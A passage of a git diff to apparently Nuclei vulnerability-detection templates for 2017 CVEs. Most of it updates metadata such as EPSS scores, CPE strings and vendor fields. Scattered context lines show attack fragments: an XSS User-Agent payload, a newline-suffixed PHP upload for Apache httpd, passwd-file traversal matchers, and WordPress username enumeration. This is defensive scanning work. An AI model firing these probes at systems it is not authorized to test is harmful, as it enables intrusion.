dreambox,edb,cve,cve2017,xss + epss-score: 0.00129 + cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 + framework: dreambox + vendor: bouqueteditor_project + product: bouqueteditor + tags: dreambox,edb,cve,cve2017,xss http: - raw: diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index 80ff0777af..0e97599956 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -15,11 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2017-15363 cwe-id: CWE-22 - cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:*:*:* epss-score: 0.04393 - tags: cve,cve2017,restler,lfi,edb + cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* metadata: max-request: 1 + framework: typo3 + vendor: luracast + product: restler + tags: cve,cve2017,restler,lfi,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 43c11e6592..5246f9d70c 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -14,9 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-15647 cwe-id: CWE-22 - tags: lfi,router,edb,cve,cve2017 + epss-score: 0.02013 + cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fiberhome + product: routerfiberhome_firmware + tags: lfi,router,edb,cve,cve2017 http: - method: GET @@ -25,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 93ba155e54..02b57dcb07 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -10,14 +10,19 @@ info: - https://httpd.apache.org/security/vulnerabilities_24.html - http://www.openwall.com/lists/oss-security/2018/03/24/6 - https://nvd.nist.gov/vuln/detail/CVE-2017-15715 + - http://www.securitytracker.com/id/1040570 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-15715 cwe-id: CWE-20 - tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive + epss-score: 0.971 + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: http_server + tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive http: - raw: @@ -36,7 +41,6 @@ http: {{randstr}}.php\x0A ------WebKitFormBoundaryKc8fBVDo558U4hbJ-- - - | GET /{{randstr}}.php\x0A HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 9cbba50286..f4fa257ff1 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -10,13 +10,18 @@ info: - https://security.paloaltonetworks.com/CVE-2017-15944 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - https://nvd.nist.gov/vuln/detail/CVE-2017-15944 + - http://www.securitytracker.com/id/1040007 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-15944 - tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect + epss-score: 0.97414 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: paloaltonetworks + product: pan-os + tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect http: - raw: diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 9faebd146b..f63a1280fc 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -15,9 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-16806 cwe-id: CWE-22 - tags: cve2017,ulterius,traversal,edb,cve + epss-score: 0.07055 + cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: ulterius + product: ulterius_server + tags: cve2017,ulterius,traversal,edb,cve http: - method: GET @@ -27,12 +31,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex + part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 9b43e325df..7b76625c78 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -14,9 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-16877 cwe-id: CWE-22 - tags: cve,cve2017,nextjs,lfi,traversal + epss-score: 0.0032 + cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zeit + product: next.js + tags: cve,cve2017,nextjs,lfi,traversal http: - method: GET @@ -25,11 +29,10 @@ http: matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body condition: and - type: status diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index e24abf7458..06b374c404 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -17,11 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2017-16894 cwe-id: CWE-200 + epss-score: 0.29151 + cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="Laravel-Framework" shodan-query: Laravel-Framework verified: true + vendor: laravel + product: laravel tags: cve2017,laravel,exposure,packetstorm,cve http: diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index b043ddfa8d..02ebc3cbb6 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17043 cwe-id: CWE-79 - tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress + epss-score: 0.00245 + cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: zitec + product: emag_marketplace_connector + tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 06019b8063..b8e4acc91f 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17059 cwe-id: CWE-79 - tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress + epss-score: 0.00263 + cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: amtythumb_project + product: amtythumb + tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress http: - method: POST @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 8d82d9b3ea..057d68e0cf 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17451 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm + epss-score: 0.00178 + cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: wpmailster + product: wp_mailster + tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 7cf3385dd1..4c3bd723a2 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -17,9 +17,13 @@ info: cvss-score: 8.1 cve-id: CVE-2017-17562 cwe-id: CWE-20 - tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub + epss-score: 0.9747 + cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:* metadata: max-request: 65 + vendor: embedthis + product: goahead + tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub http: - raw: @@ -95,11 +99,10 @@ http: - webviewLogin_m64 - webviewer - welcome - stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - "environment variable" diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 6e00b94647..7b9bd698ed 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -14,13 +14,17 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2017-17731 cwe-id: CWE-89 + epss-score: 0.11468 + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: fofa-query: app="DedeCMS" max-request: 1 shodan-query: http.html:"DedeCms" + vendor: dedecms + product: dedecms tags: sqli,dedecms - variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 82d1dea866..ad5249a47a 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -15,10 +15,14 @@ info: cvss-score: 9.8 cve-id: CVE-2017-17736 cwe-id: CWE-425 + epss-score: 0.1483 + cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: intitle:"kentico database setup" verified: true + vendor: kentico + product: kentico_cms tags: cve,cve2017,kentico,cms,install,unauth,edb http: diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index c00441e25c..35031150f7 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18024 cwe-id: CWE-79 - tags: avantfax,hackerone,packetstorm,cve,cve2017,xss + epss-score: 0.00072 + cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: avantfax + product: avantfax + tags: avantfax,hackerone,packetstorm,cve,cve2017,xss http: - raw: @@ -30,17 +34,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - 'AvantFAX' - part: body condition: and - - type: status - status: - - 200 - - type: word part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 4ad2aa8cf6..20ee57ef07 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18536 cwe-id: CWE-79 - tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin + epss-score: 0.00088 + cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: fullworks + product: stop_user_enumeration + tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin http: - method: GET @@ -26,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index a532f0fd49..e910d85074 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18598 cwe-id: CWE-79 - cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:*:*:* epss-score: 0.00094 - tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss + cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: designmodo + product: qards + tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss http: - method: GET diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 363be74494..0da8ed62b0 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -11,16 +11,19 @@ info: - https://github.com/graphite-project/graphite-web/issues/2008 - https://github.com/advisories/GHSA-vfj6-275q-4pvm - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 + - https://github.com/graphite-project/graphite-web/pull/2499 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-18638 cwe-id: CWE-918 + epss-score: 0.00902 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* - epss-score: 0.00639 - tags: cve,cve2017,graphite,ssrf,oast metadata: max-request: 1 + vendor: graphite_project + product: graphite + tags: cve,cve2017,graphite,ssrf,oast http: - method: GET diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 95d3ba460c..cf7415ab27 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -9,14 +9,18 @@ info: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html - - http://web.archive.org/web/20210124033731/https://www.securityfocus.com/bid/97884/ + - http://www.securitytracker.com/id/1038296 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 7.4 cve-id: CVE-2017-3506 - tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle + epss-score: 0.96927 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: weblogic_server + tags: rce,oast,hackerone,cve,cve2017,weblogic,oracle http: - raw: @@ -45,6 +49,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 068bb0f0ac..d2a62888f1 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -10,14 +10,19 @@ info: - https://www.exploit-db.com/exploits/43592 - https://nvd.nist.gov/vuln/detail/CVE-2017-3528 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html + - http://www.securitytracker.com/id/1038299 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-3528 cwe-id: CWE-601 - tags: oracle,redirect,edb,cve,cve2017 + epss-score: 0.00865 + cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: applications_framework + tags: oracle,redirect,edb,cve,cve2017 http: - method: GET @@ -26,6 +31,6 @@ http: matchers: - type: word + part: body words: - 'noresize src="/\interact.sh?configName=' - part: body diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index f5addf6b5d..af96fb7c99 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -9,19 +9,25 @@ info: - https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - https://nvd.nist.gov/vuln/detail/CVE-2017-4011 + - http://www.securitytracker.com/id/1038523 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-4011 cwe-id: CWE-79 - tags: cve,cve2017,mcafee,xss + epss-score: 0.00142 + cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mcafee + product: network_data_loss_prevention + tags: cve,cve2017,mcafee,xss http: - method: GET path: - "{{BaseURL}}" + headers: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);// diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index f90d19bd82..a61ad11b07 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -10,15 +10,20 @@ info: - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/ - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 + - http://www.openwall.com/lists/oss-security/2017/01/14/6 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2017-5487 cwe-id: CWE-200 + epss-score: 0.97204 + cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"WordPress" verified: true + vendor: wordpress + product: wordpress tags: cve,cve2017,wordpress,wp,edb http: @@ -28,9 +33,9 @@ http: - "{{BaseURL}}/?rest_route=/wp/v2/users/" stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: @@ -50,8 +55,8 @@ http: extractors: - type: json - part: body name: "usernames" json: - '.[] | .slug' - '.[].name' + part: body diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 9ee42021b0..185a441acb 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -9,16 +9,20 @@ info: reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 + - https://www.exploit-db.com/exploits/41205/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 - tags: cve,cve2017,auth-bypass,netgear,router,kev + epss-score: 0.97402 + cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: r6200_firmware + tags: cve,cve2017,auth-bypass,netgear,router,kev http: - method: GET diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 70399dd74a..75bc656d40 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - tags: edb,cve,cve2017,xss,caseaware + epss-score: 0.00286 + cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kmc_information_systems + product: caseaware + tags: edb,cve,cve2017,xss,caseaware http: - method: GET diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 7169cd0706..99477c463d 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -11,15 +11,20 @@ info: - https://isc.sans.edu/diary/22169 - https://github.com/rapid7/metasploit-framework/issues/8064 - https://nvd.nist.gov/vuln/detail/CVE-2017-5638 + - http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 + epss-score: 0.9756 + cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"Apache Struts" verified: true + vendor: apache + product: struts tags: cve,cve2017,apache,kev,msf,struts,rce http: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index f6769d355d..bacdfcdaf9 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -16,12 +16,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-5689 - cpe: cpe:2.3:o:intel:active_management_technology_firmware:*:*:*:*:*:*:*:* - epss-score: 0.9746 + epss-score: 0.97453 + cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: title:"Active Management Technology" verified: true + vendor: intel + product: active_management_technology_firmware tags: cve,cve2017,amt,intel,tenable,kev http: @@ -29,13 +31,13 @@ http: - | GET / HTTP/1.1 Host: {{Hostname}} - - | GET /hw-sys.htm HTTP/1.1 Host: {{Hostname}} - digest-username: admin req-condition: true + digest-username: admin + matchers-condition: and matchers: - type: word diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 4cddc250c4..89a02cb956 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -14,10 +14,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-5982 - cwe-id: CWE-98 - tags: cve2017,kodi,lfi,edb,cve + cwe-id: CWE-22 + epss-score: 0.0488 + cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kodi + product: kodi + tags: cve2017,kodi,lfi,edb,cve http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 0fb85adfeb..c8ef3c09a9 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -14,9 +14,13 @@ info: cvss-score: 8.8 cve-id: CVE-2017-6090 cwe-id: CWE-434 + epss-score: 0.97366 + cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:"PhpCollab" + vendor: phpcollab + product: phpcollab tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive http: @@ -33,7 +37,6 @@ http: -----------------------------154934846911423734231554128137-- - - | GET /logos_clients/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index e57fb17702..e25d2159ab 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -11,14 +11,19 @@ info: - https://github.com/danigargu/explodingcan/blob/master/explodingcan.py - https://nvd.nist.gov/vuln/detail/CVE-2017-7269 - https://github.com/edwardz246003/IIS_exploit + - http://www.securitytracker.com/id/1038168 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-7269 cwe-id: CWE-119 - tags: cve,cve2017,rce,windows,iis,kev + epss-score: 0.97156 + cpe: cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: microsoft + product: internet_information_server + tags: cve,cve2017,rce,windows,iis,kev http: - method: OPTIONS @@ -27,19 +32,19 @@ http: matchers-condition: and matchers: + - type: dsl + dsl: + - regex("", dasl) + - regex("[\d]+(,\s+[\d]+)?", dav) + - regex(".*?PROPFIND", public) + - regex(".*?PROPFIND", allow) + condition: or + - type: word part: header words: - "IIS/6.0" - - type: dsl - dsl: - - regex("", dasl) # lowercase header name: DASL - - regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV - - regex(".*?PROPFIND", public) # lowercase header name: Public - - regex(".*?PROPFIND", allow) # lowercase header name: Allow - condition: or - - type: status status: - 200 diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 926d22758b..2de8d4390d 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2017-7391 cwe-id: CWE-79 - tags: cve,cve2017,magmi,xss + epss-score: 0.00204 + cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: magmi_project + product: magmi + tags: cve,cve2017,magmi,xss http: - method: GET @@ -26,10 +30,6 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: @@ -39,3 +39,7 @@ http: part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 813b4721eb..6961066739 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -4,7 +4,6 @@ id: CVE-2017-7615 # To carry out further attacks, please see reference[2] below. # This template works by guessing user ID. # MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1]. - info: name: MantisBT <=2.30 - Arbitrary Password Reset/Admin Access author: bp0lr,dwisiswant0 @@ -22,11 +21,13 @@ info: cvss-score: 8.8 cve-id: CVE-2017-7615 cwe-id: CWE-640 + epss-score: 0.97443 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* - epss-score: 0.97472 - tags: cve,cve2017,mantisbt,unauth,edb metadata: max-request: 5 + vendor: mantisbt + product: mantisbt + tags: cve,cve2017,mantisbt,unauth,edb http: - method: GET @@ -38,6 +39,7 @@ http: - "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 8a3ffec857..26ddf1ee87 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -9,14 +9,19 @@ info: - http://www.hikvision.com/us/about_10805.html - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 - https://nvd.nist.gov/vuln/detail/CVE-2017-7921 + - https://ghostbin.com/paste/q2vq2 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2017-7921 cwe-id: CWE-287 - tags: cve,cve2017,auth-bypass,hikvision + epss-score: 0.01169 + cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: hikvision + product: ds-2cd2032-i_firmware + tags: cve,cve2017,auth-bypass,hikvision http: - method: GET @@ -26,11 +31,11 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word + part: header words: - "application/xml" - part: header diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 7f9f0f3d9b..9e64a33e8d 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -10,17 +10,21 @@ info: - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html - https://nvd.nist.gov/vuln/detail/CVE-2017-8917 - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522 + - http://www.securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-8917 cwe-id: CWE-89 + epss-score: 0.97555 + cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Joomla" verified: true + vendor: joomla + product: joomla\! tags: cve,cve2017,joomla,sqli - variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 81889522ac..0f5a788895 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -10,15 +10,20 